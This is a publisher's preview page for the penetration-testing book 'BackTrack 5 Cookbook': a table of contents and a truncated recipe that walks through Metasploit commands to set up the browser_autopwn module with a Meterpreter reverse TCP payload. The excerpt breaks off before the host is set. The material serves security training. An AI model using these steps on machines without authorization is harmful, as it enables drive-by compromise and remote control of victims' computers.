Book Image

BackTrack 5 Cookbook

By : Willie L. Pritchett, David De Smet
Book Image

BackTrack 5 Cookbook

By: Willie L. Pritchett, David De Smet

Overview of this book

<p>BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm.<br /><br />"BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, priviledge escalation, and covering your tracks.<br /><br />The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests.<br /><br />We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, Password cracking, and BackTrack forensics.<br /><br />"BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike.</p>

Related Content you might be interested in

Current Title:

Small book image
BackTrack 5 Cookbook
Willie L. Pritchett | David De Smet
Dec, 2012 | 296 pages
No titles found
Table of Contents (17 chapters)
BackTrack 5 Cookbook
BackTrack 5 Cookbook
Credits
Credits
About the Authors
About the Authors
About the Reviewers
About the Reviewers
www.PacktPub.com
www.PacktPub.com
Preface
Preface
Free Chapter
1
Up and Running with BackTrack
Up and Running with BackTrack
Introduction
Installing BackTrack to a hard disk drive
Installing BackTrack to a USB drive with persistent memory
Installing BackTrack on VirtualBox
Installing BackTrack using VMware Tools
Fixing the splash screen
Changing the root password
Starting network services
Setting up the wireless network
2
Customizing BackTrack
Customizing BackTrack
Introduction
Preparing kernel headers
Installing Broadcom drivers
Installing and configuring ATI video card drivers
Installing and configuring NVIDIA video card drivers
Applying updates and configuring extra security tools
Setting up ProxyChains
Directory encryption
3
Information Gathering
Information Gathering
Introduction
Service enumeration
Determining the network range
Identifying active machines
Finding open ports
Operating system fingerprinting
Service fingerprinting
Threat assessment with Maltego
Mapping the network
4
Vulnerability Identification
Vulnerability Identification
Introduction
Installing, configuring, and starting Nessus
Nessus – finding local vulnerabilities
Nessus – finding network vulnerabilities
Nessus – finding Linux-specific vulnerabilities
Nessus – finding Windows-specific vulnerabilities
Installing, configuring, and starting OpenVAS
OpenVAS – finding local vulnerabilities
OpenVAS – finding network vulnerabilities
OpenVAS – finding Linux-specific vulnerabilities
OpenVAS – finding Windows-specific vulnerabilities
5
Exploitation
Exploitation
Introduction
Implementing exploits from BackTrack
Installing and configuring Metasploitable
Mastering Armitage – the graphical management tool for Metasploit
Mastering the Metasploit Console (MSFCONSOLE)
Mastering the Metasploit CLI (MSFCLI)
Mastering Meterpreter
Metasploitable MySQL
Metasploitable PostgreSQL
Metasploitable Tomcat
Metasploitable PDF
Implementing the browser_autopwn module
6
Privilege Escalation
Privilege Escalation
Introduction
Using impersonation tokens
Local privilege escalation attack
Mastering the Social-Engineer Toolkit (SET)
Collecting victims' data
Cleaning up the tracks
Creating a persistent backdoor
Man-in-the-middle attack (MITM)
7
Wireless Network Analysis
Wireless Network Analysis
Introduction
Cracking a WEP wireless network
Cracking a WPA/WPA2 wireless network
Automating wireless network cracking
Accessing clients using a fake AP
URL traffic manipulation
Port redirection
Sniffing network traffic
Accessing an e-mail by stealing cookies
8
Voice over IP (VoIP)
Voice over IP (VoIP)
Introduction
Using Svmap
Finding valid extensions
Monitoring, capturing, and eavesdropping on VoIP traffic
Using VoIPong
Mastering UCSniff
Mastering Xplico
Capturing SIP authentication
Mastering VoIP Hopper
Causing a denial of service
Attacking VoIP using Metasploit
Sniffing DECT phones
9
Password Cracking
Password Cracking
Introduction
Online password attacks
Cracking HTTP passwords
Gaining router access
Password profiling
Cracking a Windows password using John the Ripper
Using dictionary attacks
Using rainbow tables
Using NVIDIA Compute Unified Device Architecture (CUDA)
Using ATI Stream
Physical access attacks
10
BackTrack Forensics
BackTrack Forensics
Introduction
Intrusion detection and log analysis
Recursive directory encryption/decryption
Scanning for signs of rootkits
Recovering data from a problematic source
Retrieving a Windows password
Resetting a Windows password
Looking at the Windows registry entries
Index
Index

Implementing the browser_autopwn module

Browser_autopwn is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim's machine simply by the user accessing a web page. Browser_autopwn performs a fingerprint of the client before it attacks, meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of the browser, it decides which exploit is the best to deploy.

Getting ready

A connection to the Internet or internal network is required to complete this recipe.

How to do it...

Let's begin by opening a terminal window:

  1. Open a terminal window.

  2. Launch the MSFCONSOLE:

    msfconsole

  3. Search for the Autopwn modules:

    search autopwn

  4. Use the browser_autopwn module:

    use auxiliary/server/browser_autopwn

  5. Set our payload. In this case, we use Windows Reverse TCP:

    set payload windows/meterpreter/reverse_tcp

  6. Show the options for this type of payload:

    show options

  7. Set the host IP address to where the reverse connection...

Previous Section
End of Chapter 5
Next Chapter